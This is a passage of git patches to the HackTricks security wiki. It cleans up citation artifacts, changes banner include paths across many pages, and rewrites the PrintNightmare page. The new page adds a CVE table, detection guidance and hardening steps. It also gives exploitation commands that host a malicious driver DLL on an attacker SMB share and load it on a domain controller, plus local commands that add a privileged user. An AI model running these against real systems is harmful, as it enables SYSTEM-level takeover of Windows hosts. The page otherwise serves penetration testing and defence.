vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| citeturn2search0| +|2023|CVE-2023-4863|`libwebp` ≤ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| | |2024|Multiple|OpenSSL 3.x series|Several memory-safety and padding-oracle issues. Many Flutter & ReactNative bundles ship their own `libcrypto.so`.| When you spot *third-party* `.so` files inside an APK, always cross-check their hash against upstream advisories. SCA (Software Composition Analysis) is uncommon on mobile, so outdated vulnerable builds are rampant. @@ -92,7 +92,7 @@ When you spot *third-party* `.so` files inside an APK, always cross-check their ### References -- Frida 16.x change-log (Android hooking, tiny-function relocation) – [frida.re/news](https://frida.re/news/) citeturn5search0 -- NVD advisory for `libwebp` overflow CVE-2023-4863 – [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863) citeturn2search0 +- Frida 16.x change-log (Android hooking, tiny-function relocation) – [frida.re/news](https://frida.re/news/) +- NVD advisory for `libwebp` overflow CVE-2023-4863 – [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md index 004d7bf0e..791da2761 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md +++ b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md @@ -106,7 +106,7 @@ Recent Frida releases (>=16) automatically handle pointer authentication and oth ### Automated dynamic analysis with MobSF (no jailbreak) -[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【turn6view0†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB: +[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB: ```bash docker pull opensecurity/mobile-security-framework-mobsf:latest diff --git a/src/pentesting-web/sql-injection/ms-access-sql-injection.md b/src/pentesting-web/sql-injection/ms-access-sql-injection.md index 913a7a03f..5b9778a7a 100644 --- a/src/pentesting-web/sql-injection/ms-access-sql-injection.md +++ b/src/pentesting-web/sql-injection/ms-access-sql-injection.md @@ -141,7 +141,7 @@ Point the UNC path to: * a host that drops the TCP handshake after `SYN-ACK` * a firewall sinkhole -The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984. citeturn1search0 +The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984. ### Other Interesting functions @@ -229,7 +229,7 @@ Mitigations (recommended even for legacy Classic ASP apps): * Block outbound SMB/WebDAV at the network boundary. * Sanitize / parameterise any part of a query that may end up inside an `IN` clause. -The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent. citeturn0search0 +The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent. ### .mdb Password Cracker diff --git a/src/windows-hardening/active-directory-methodology/printnightmare.md b/src/windows-hardening/active-directory-methodology/printnightmare.md index dbc693618..212f04ab1 100644 --- a/src/windows-hardening/active-directory-methodology/printnightmare.md +++ b/src/windows-hardening/active-directory-methodology/printnightmare.md @@ -1,10 +1,106 @@ -# PrintNightmare +# PrintNightmare (Windows Print Spooler RCE/LPE) {{#include ../../banners/hacktricks-training.md}} -**Check this awesome blog post about PrintNightmare in 2024: [https://www.hackingarticles.in/understanding-printnightmare-vulnerability/](https://www.hackingarticles.in/understanding-printnightmare-vulnerability/)** +> PrintNightmare is the collective name given to a family of vulnerabilities in the Windows **Print Spooler** service that allow **arbitrary code execution as SYSTEM** and, when the spooler is reachable over RPC, **remote code execution (RCE) on domain controllers and file servers**. The most-widely exploited CVEs are **CVE-2021-1675** (initially classed as LPE) and **CVE-2021-34527** (full RCE). Subsequent issues such as **CVE-2021-34481 (“Point & Print”)** and **CVE-2022-21999 (“SpoolFool”)** prove that the attack surface is still far from closed. + +--- + +## 1. Vulnerable components & CVEs + +| Year | CVE | Short name | Primitive | Notes | +|------|-----|------------|-----------|-------| +|2021|CVE-2021-1675|“PrintNightmare #1”|LPE|Patched in June 2021 CU but bypassed by CVE-2021-34527| +|2021|CVE-2021-34527|“PrintNightmare”|RCE/LPE|AddPrinterDriverEx allows authenticated users to load a driver DLL from a remote share| +|2021|CVE-2021-34481|“Point & Print”|LPE|Unsigned driver installation by non-admin users| +|2022|CVE-2022-21999|“SpoolFool”|LPE|Arbitrary directory creation → DLL planting – works after 2021 patches| + +All of them abuse one of the **MS-RPRN / MS-PAR RPC methods** (`RpcAddPrinterDriver`, `RpcAddPrinterDriverEx`, `RpcAsyncAddPrinterDriver`) or trust relationships inside **Point & Print**. + +## 2. Exploitation techniques + +### 2.1 Remote Domain Controller compromise (CVE-2021-34527) + +An authenticated but **non-privileged** domain user can run arbitrary DLLs as **NT AUTHORITY\SYSTEM** on a remote spooler (often the DC) by: + +```powershell +# 1. Host malicious driver DLL on a share the victim can reach +impacket-smbserver share ./evil_driver/ -smb2support + +# 2. Use a PoC to call RpcAddPrinterDriverEx +python3 CVE-2021-1675.py victim_DC.domain.local 'DOMAIN/user:Password!' \ + -f \ + '\\attacker_IP\share\evil.dll' +``` + +Popular PoCs include **CVE-2021-1675.py** (Python/Impacket), **SharpPrintNightmare.exe** (C#) and Benjamin Delpy’s `misc::printnightmare / lsa::addsid` modules in **mimikatz**. + +### 2.2 Local privilege escalation (any supported Windows, 2021-2024) + +The same API can be called **locally** to load a driver from `C:\Windows\System32\spool\drivers\x64\3\` and achieve SYSTEM privileges: + +```powershell +Import-Module .\Invoke-Nightmare.ps1 +Invoke-Nightmare -NewUser hacker -NewPassword P@ssw0rd! +``` + +### 2.3 SpoolFool (CVE-2022-21999) – bypassing 2021 fixes + +Microsoft’s 2021 patches blocked remote driver loading but **did not harden directory permissions**. SpoolFool abuses the `SpoolDirectory` parameter to create an arbitrary directory under `C:\Windows\System32\spool\drivers\`, drops a payload DLL, and forces the spooler to load it: + +```powershell +# Binary version (local exploit) +SpoolFool.exe -dll add_user.dll + +# PowerShell wrapper +Import-Module .\SpoolFool.ps1 ; Invoke-SpoolFool -dll add_user.dll +``` + +> The exploit works on fully-patched Windows 7 → Windows 11 and Server 2012R2 → 2022 before February 2022 updates + +--- + +## 3. Detection & hunting + +* **Event Logs** – enable the *Microsoft-Windows-PrintService/Operational* and *Admin* channels and watch for **Event ID 808** “The print spooler failed to load a plug-in module” or for **RpcAddPrinterDriverEx** messages. +* **Sysmon** – `Event ID 7` (Image loaded) or `11/23` (File write/delete) inside `C:\Windows\System32\spool\drivers\*` when the parent process is **spoolsv.exe**. +* **Process lineage** – alerts whenever **spoolsv.exe** spawns `cmd.exe`, `rundll32.exe`, PowerShell or any unsigned binary . + +## 4. Mitigation & hardening + +1. **Patch!** – Apply the latest cumulative update on every Windows host that has the Print Spooler service installed. +2. **Disable the spooler where it is not required**, especially on Domain Controllers: + ```powershell + Stop-Service Spooler -Force + Set-Service Spooler -StartupType Disabled + ``` +3. **Block remote connections** while still allowing local printing – Group Policy: `Computer Configuration → Administrative Templates → Printers → Allow Print Spooler to accept client connections = Disabled`. +4. **Restrict Point & Print** so only administrators can add drivers by setting the registry value: + ```cmd + reg add "HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint" \ + /v RestrictDriverInstallationToAdministrators /t REG_DWORD /d 1 /f + ``` + Detailed guidance in Microsoft KB5005652 + +--- + +## 5. Related research / tools + +* [mimikatz `printnightmare`](https://github.com/gentilkiwi/mimikatz/tree/master/modules) modules +* SharpPrintNightmare (C#) / Invoke-Nightmare (PowerShell) +* SpoolFool exploit & write-up +* 0patch micropatches for SpoolFool and other spooler bugs + +--- + +**More reading (external):** Check the 2024 walk-through blog post – [Understanding PrintNightmare Vulnerability](https://www.hackingarticles.in/understanding-printnightmare-vulnerability/) {{#include ../../banners/hacktricks-training.md}} +## References - +* Microsoft – *KB5005652: Manage new Point & Print default driver installation behavior* + +* Oliver Lyak – *SpoolFool: CVE-2022-21999* + +{{#include /banners/hacktricks-training.md}} From 23d3f5017d7dcd753f9e2c6836b5c25554cb49aa Mon Sep 17 00:00:00 2001 From: carlospolop Date: Sat, 12 Jul 2025 10:48:33 +0200 Subject: [PATCH 6/8] a --- src/AI/AI-llm-architecture/0.-basic-llm-concepts.md | 4 ++-- src/AI/AI-llm-architecture/1.-tokenizing.md | 4 ++-- src/AI/AI-llm-architecture/2.-data-sampling.md | 4 ++-- src/AI/AI-llm-architecture/3.-token-embeddings.md | 4 ++-- src/AI/AI-llm-architecture/4.-attention-mechanisms.md | 4 ++-- src/AI/AI-llm-architecture/5.-llm-architecture.md | 4 ++-- .../AI-llm-architecture/6.-pre-training-and-loading-models.md | 4 ++-- .../7.0.-lora-improvements-in-fine-tuning.md | 4 ++-- .../7.1.-fine-tuning-for-classification.md | 4 ++-- .../7.2.-fine-tuning-to-follow-instructions.md | 4 ++-- src/AI/AI-llm-architecture/README.md | 4 ++-- src/binary-exploitation/arbitrary-write-2-exec/README.md | 2 +- .../arbitrary-write-2-exec/aw2exec-sips-icc-profile.md | 2 +- src/binary-exploitation/array-indexing.md | 2 +- .../stack-canaries/bf-forked-stack-canaries.md | 2 +- src/binary-exploitation/ios-exploiting.md | 4 ++-- src/binary-exploitation/libc-heap/README.md | 4 ++-- src/binary-exploitation/libc-heap/use-after-free/first-fit.md | 2 +- .../phishing-methodology/discord-invite-hijacking.md | 2 +- src/generic-methodologies-and-resources/threat-modeling.md | 4 ++-- .../macos-dangerous-entitlements.md | 2 +- src/mobile-pentesting/android-app-pentesting/flutter.md | 2 +- src/network-services-pentesting/1414-pentesting-ibmmq.md | 2 +- src/network-services-pentesting/pentesting-ntp.md | 2 +- src/network-services-pentesting/pentesting-web/angular.md | 4 ++-- src/network-services-pentesting/pentesting-web/django.md | 4 ++-- src/network-services-pentesting/pentesting-web/laravel.md | 2 +- .../pentesting-web/nodejs-express.md | 4 ++-- .../pentesting-web/spring-actuators.md | 2 +- .../file-inclusion/lfi2rce-via-nginx-temp-files.md | 2 +- src/pentesting-web/idor.md | 2 +- src/pentesting-web/xss-cross-site-scripting/README.md | 2 +- src/todo/hardware-hacking/fault_injection_attacks.md | 4 ++-- src/todo/hardware-hacking/side_channel_analysis.md | 4 ++-- src/todo/industrial-control-systems-hacking/README.md | 4 ++-- src/todo/industrial-control-systems-hacking/modbus.md | 4 ++-- src/todo/investment-terms.md | 4 ++-- src/todo/radio-hacking/README.md | 2 +- src/todo/radio-hacking/fissure-the-rf-framework.md | 4 ++-- src/todo/rust-basics.md | 4 ++-- src/todo/test-llms.md | 4 ++-- .../active-directory-methodology/TimeRoasting.md | 4 ++-- src/windows-hardening/cobalt-strike.md | 4 ++-- 43 files changed, 70 insertions(+), 70 deletions(-) diff --git a/src/AI/AI-llm-architecture/0.-basic-llm-concepts.md b/src/AI/AI-llm-architecture/0.-basic-llm-concepts.md index c25339647..83ce8371c 100644 --- a/src/AI/AI-llm-architecture/0.-basic-llm-concepts.md +++ b/src/AI/AI-llm-architecture/0.-basic-llm-concepts.md @@ -1,6 +1,6 @@ # 0. Basic LLM Concepts -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} ## Pretraining @@ -300,4 +300,4 @@ During the backward pass: - **Accuracy:** Provides exact derivatives up to machine precision. - **Ease of Use:** Eliminates manual computation of derivatives. -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/AI/AI-llm-architecture/1.-tokenizing.md b/src/AI/AI-llm-architecture/1.-tokenizing.md index b8712ad67..7e4ae9818 100644 --- a/src/AI/AI-llm-architecture/1.-tokenizing.md +++ b/src/AI/AI-llm-architecture/1.-tokenizing.md @@ -1,6 +1,6 @@ # 1. Tokenizing -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} ## Tokenizing @@ -99,4 +99,4 @@ print(token_ids[:50]) - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/AI/AI-llm-architecture/2.-data-sampling.md b/src/AI/AI-llm-architecture/2.-data-sampling.md index dd990c0ba..42d43f051 100644 --- a/src/AI/AI-llm-architecture/2.-data-sampling.md +++ b/src/AI/AI-llm-architecture/2.-data-sampling.md @@ -1,6 +1,6 @@ # 2. Data Sampling -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} ## **Data Sampling** @@ -241,4 +241,4 @@ tensor([[ 367, 2885, 1464, 1807], - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/AI/AI-llm-architecture/3.-token-embeddings.md b/src/AI/AI-llm-architecture/3.-token-embeddings.md index afaccba6f..b0d34dc2e 100644 --- a/src/AI/AI-llm-architecture/3.-token-embeddings.md +++ b/src/AI/AI-llm-architecture/3.-token-embeddings.md @@ -1,6 +1,6 @@ # 3. Token Embeddings -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} ## Token Embeddings @@ -219,4 +219,4 @@ print(input_embeddings.shape) # torch.Size([8, 4, 256]) - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/AI/AI-llm-architecture/4.-attention-mechanisms.md b/src/AI/AI-llm-architecture/4.-attention-mechanisms.md index e779d26a9..9f73a4eec 100644 --- a/src/AI/AI-llm-architecture/4.-attention-mechanisms.md +++ b/src/AI/AI-llm-architecture/4.-attention-mechanisms.md @@ -1,6 +1,6 @@ # 4. Attention Mechanisms -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} ## Attention Mechanisms and Self-Attention in Neural Networks @@ -430,5 +430,5 @@ For another compact and efficient implementation you could use the [`torch.nn.Mu - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/AI/AI-llm-architecture/5.-llm-architecture.md b/src/AI/AI-llm-architecture/5.-llm-architecture.md index 107f09543..7e375b6f6 100644 --- a/src/AI/AI-llm-architecture/5.-llm-architecture.md +++ b/src/AI/AI-llm-architecture/5.-llm-architecture.md @@ -1,6 +1,6 @@ # 5. LLM Architecture -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} ## LLM Architecture @@ -702,4 +702,4 @@ print("Output length:", len(out[0])) - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/AI/AI-llm-architecture/6.-pre-training-and-loading-models.md b/src/AI/AI-llm-architecture/6.-pre-training-and-loading-models.md index dc0705aa0..4ebc737e9 100644 --- a/src/AI/AI-llm-architecture/6.-pre-training-and-loading-models.md +++ b/src/AI/AI-llm-architecture/6.-pre-training-and-loading-models.md @@ -1,6 +1,6 @@ # 6. Pre-training & Loading models -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} ## Text Generation @@ -971,4 +971,4 @@ There 2 quick scripts to load the GPT2 weights locally. For both you can clone t - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.md b/src/AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.md index d1feef344..24d1f900d 100644 --- a/src/AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.md +++ b/src/AI/AI-llm-architecture/7.0.-lora-improvements-in-fine-tuning.md @@ -1,6 +1,6 @@ # 7.0. LoRA Improvements in fine-tuning -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} ## LoRA Improvements @@ -64,4 +64,4 @@ def replace_linear_with_lora(model, rank, alpha): - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.md b/src/AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.md index 67caa9bb5..98df3b564 100644 --- a/src/AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.md +++ b/src/AI/AI-llm-architecture/7.1.-fine-tuning-for-classification.md @@ -1,6 +1,6 @@ # 7.1. Fine-Tuning for Classification -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} ## What is @@ -117,4 +117,4 @@ You can find all the code to fine-tune GPT2 to be a spam classifier in [https:// - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.md b/src/AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.md index 69328b25b..1398b73d5 100644 --- a/src/AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.md +++ b/src/AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.md @@ -1,6 +1,6 @@ # 7.2. Fine-Tuning to follow instructions -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} > [!TIP] > The goal of this section is to show how to **fine-tune an already pre-trained model to follow instructions** rather than just generating text, for example, responding to tasks as a chat bot. @@ -107,4 +107,4 @@ You can find an example of the code to perform this fine tuning in [https://gith - [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch) -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/AI/AI-llm-architecture/README.md b/src/AI/AI-llm-architecture/README.md index 86925f2b5..8d18bf89d 100644 --- a/src/AI/AI-llm-architecture/README.md +++ b/src/AI/AI-llm-architecture/README.md @@ -1,6 +1,6 @@ # LLM Training - Data Preparation -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} **These are my notes from the very recommended book** [**https://www.manning.com/books/build-a-large-language-model-from-scratch**](https://www.manning.com/books/build-a-large-language-model-from-scratch) **with some extra information.** @@ -99,4 +99,4 @@ You should start by reading this post for some basic concepts you should know ab 7.2.-fine-tuning-to-follow-instructions.md {{#endref}} -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/arbitrary-write-2-exec/README.md b/src/binary-exploitation/arbitrary-write-2-exec/README.md index 590c7c6f8..207dbba64 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/README.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/README.md @@ -1,6 +1,6 @@ # Arbitrary Write 2 Exec -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md index 9e5354d6b..bc6d6480a 100644 --- a/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md +++ b/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md @@ -52,4 +52,4 @@ Successful exploitation results in remote arbitrary code execution at user privi - Apple October 2024 Security Update (patch shipping CVE-2024-44236) https://support.apple.com/en-us/121564 -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/array-indexing.md b/src/binary-exploitation/array-indexing.md index 77a067dbf..12c30102b 100644 --- a/src/binary-exploitation/array-indexing.md +++ b/src/binary-exploitation/array-indexing.md @@ -20,4 +20,4 @@ However he you can find some nice **examples**: -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md index ea5a33186..0ec3de2d3 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/stack-canaries/bf-forked-stack-canaries.md @@ -123,4 +123,4 @@ Check also the presentation of [https://www.slideshare.net/codeblue_jp/master-ca -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/ios-exploiting.md b/src/binary-exploitation/ios-exploiting.md index 1b9b61739..d97f353f8 100644 --- a/src/binary-exploitation/ios-exploiting.md +++ b/src/binary-exploitation/ios-exploiting.md @@ -1,6 +1,6 @@ # iOS Exploiting -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} ## Physical use-after-free @@ -213,4 +213,4 @@ void iosurface_kwrite64(uint64_t addr, uint64_t value) { With these primitives, the exploit provides controlled **32-bit reads** and **64-bit writes** to kernel memory. Further jailbreak steps could involve more stable read/write primitives, which may require bypassing additional protections (e.g., PPL on newer arm64e devices). -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/libc-heap/README.md b/src/binary-exploitation/libc-heap/README.md index 98b5cc160..7ebab0f69 100644 --- a/src/binary-exploitation/libc-heap/README.md +++ b/src/binary-exploitation/libc-heap/README.md @@ -1,6 +1,6 @@ # Libc Heap -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} ## Heap Basics @@ -531,4 +531,4 @@ heap-memory-functions/heap-functions-security-checks.md - [https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/](https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/) -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/libc-heap/use-after-free/first-fit.md b/src/binary-exploitation/libc-heap/use-after-free/first-fit.md index fe4a96cb7..c90112b42 100644 --- a/src/binary-exploitation/libc-heap/use-after-free/first-fit.md +++ b/src/binary-exploitation/libc-heap/use-after-free/first-fit.md @@ -66,4 +66,4 @@ d = malloc(20); // a -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md b/src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md index 866afea3c..5fa7203cf 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md @@ -60,4 +60,4 @@ This approach avoids direct file downloads and leverages familiar UI elements to - From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery – https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/ - Discord Custom Invite Link Documentation – https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/generic-methodologies-and-resources/threat-modeling.md b/src/generic-methodologies-and-resources/threat-modeling.md index b42de9625..3ed08bd94 100644 --- a/src/generic-methodologies-and-resources/threat-modeling.md +++ b/src/generic-methodologies-and-resources/threat-modeling.md @@ -1,6 +1,6 @@ # Threat Modeling -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} ## Threat Modeling @@ -113,5 +113,5 @@ Now your finished model should look something like this. And this is how you mak This is a free tool from Microsoft that helps in finding threats in the design phase of software projects. It uses the STRIDE methodology and is particularly suitable for those developing on Microsoft's stack. -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md index f2b3a0202..cf4dd992e 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-dangerous-entitlements.md @@ -173,4 +173,4 @@ Allow the process to **ask for all the TCC permissions**. -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/android-app-pentesting/flutter.md b/src/mobile-pentesting/android-app-pentesting/flutter.md index 581712421..907176652 100644 --- a/src/mobile-pentesting/android-app-pentesting/flutter.md +++ b/src/mobile-pentesting/android-app-pentesting/flutter.md @@ -80,4 +80,4 @@ Flutter itself **ignores device proxy settings**. Easiest options: - [https://sensepost.com/blog/2025/intercepting-https-communication-in-flutter-going-full-hardcore-mode-with-frida/](https://sensepost.com/blog/2025/intercepting-https-communication-in-flutter-going-full-hardcore-mode-with-frida/) -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/1414-pentesting-ibmmq.md b/src/network-services-pentesting/1414-pentesting-ibmmq.md index f1536f038..68aab11f2 100644 --- a/src/network-services-pentesting/1414-pentesting-ibmmq.md +++ b/src/network-services-pentesting/1414-pentesting-ibmmq.md @@ -364,4 +364,4 @@ CONTAINER ID IMAGE COMMAND CRE -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-ntp.md b/src/network-services-pentesting/pentesting-ntp.md index abf43fe68..c330fe2e9 100644 --- a/src/network-services-pentesting/pentesting-ntp.md +++ b/src/network-services-pentesting/pentesting-ntp.md @@ -195,4 +195,4 @@ Entry_2: - Khronos/Chronos draft (time-shift mitigation) - chronyc manual/examples for remote monitoring - zgrab2 ntp module docs -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-web/angular.md b/src/network-services-pentesting/pentesting-web/angular.md index 0e2fa7917..ff1648acb 100644 --- a/src/network-services-pentesting/pentesting-web/angular.md +++ b/src/network-services-pentesting/pentesting-web/angular.md @@ -1,6 +1,6 @@ # Angular -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} ## The Checklist @@ -616,5 +616,5 @@ According to the W3C documentation, the `window.location` and `document.location -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-web/django.md b/src/network-services-pentesting/pentesting-web/django.md index a279c59f8..946fd634f 100644 --- a/src/network-services-pentesting/pentesting-web/django.md +++ b/src/network-services-pentesting/pentesting-web/django.md @@ -1,6 +1,6 @@ # Django -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} ## Cache Manipulation to RCE Django's default cache storage method is [Python pickles](https://docs.python.org/3/library/pickle.html), which can lead to RCE if [untrusted input is unpickled](https://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_Slides.pdf). **If an attacker can gain write access to the cache, they can escalate this vulnerability to RCE on the underlying server**. @@ -76,4 +76,4 @@ Always fingerprint the exact framework version via the `X-Frame-Options` error p * Django security release – "Django 5.2.2, 5.1.10, 4.2.22 address CVE-2025-48432" – 4 Jun 2025. citeturn0search0 * OP-Innovate: "Django releases security updates to address SQL injection flaw CVE-2024-42005" – 11 Aug 2024. citeturn1search2 -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-web/laravel.md b/src/network-services-pentesting/pentesting-web/laravel.md index 0763e46f8..ecf2c580d 100644 --- a/src/network-services-pentesting/pentesting-web/laravel.md +++ b/src/network-services-pentesting/pentesting-web/laravel.md @@ -1,6 +1,6 @@ # Laravel -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} ### Laravel SQLInjection diff --git a/src/network-services-pentesting/pentesting-web/nodejs-express.md b/src/network-services-pentesting/pentesting-web/nodejs-express.md index ee11bcafb..cd0d1c66b 100644 --- a/src/network-services-pentesting/pentesting-web/nodejs-express.md +++ b/src/network-services-pentesting/pentesting-web/nodejs-express.md @@ -1,6 +1,6 @@ # NodeJS Express -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} ## Cookie Signature @@ -39,5 +39,5 @@ cookie-monster -e -f new_cookie.json -k secret ``` -{{#include /banners/hacktricks-training.md}} +{{#include /src/banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-web/spring-actuators.md 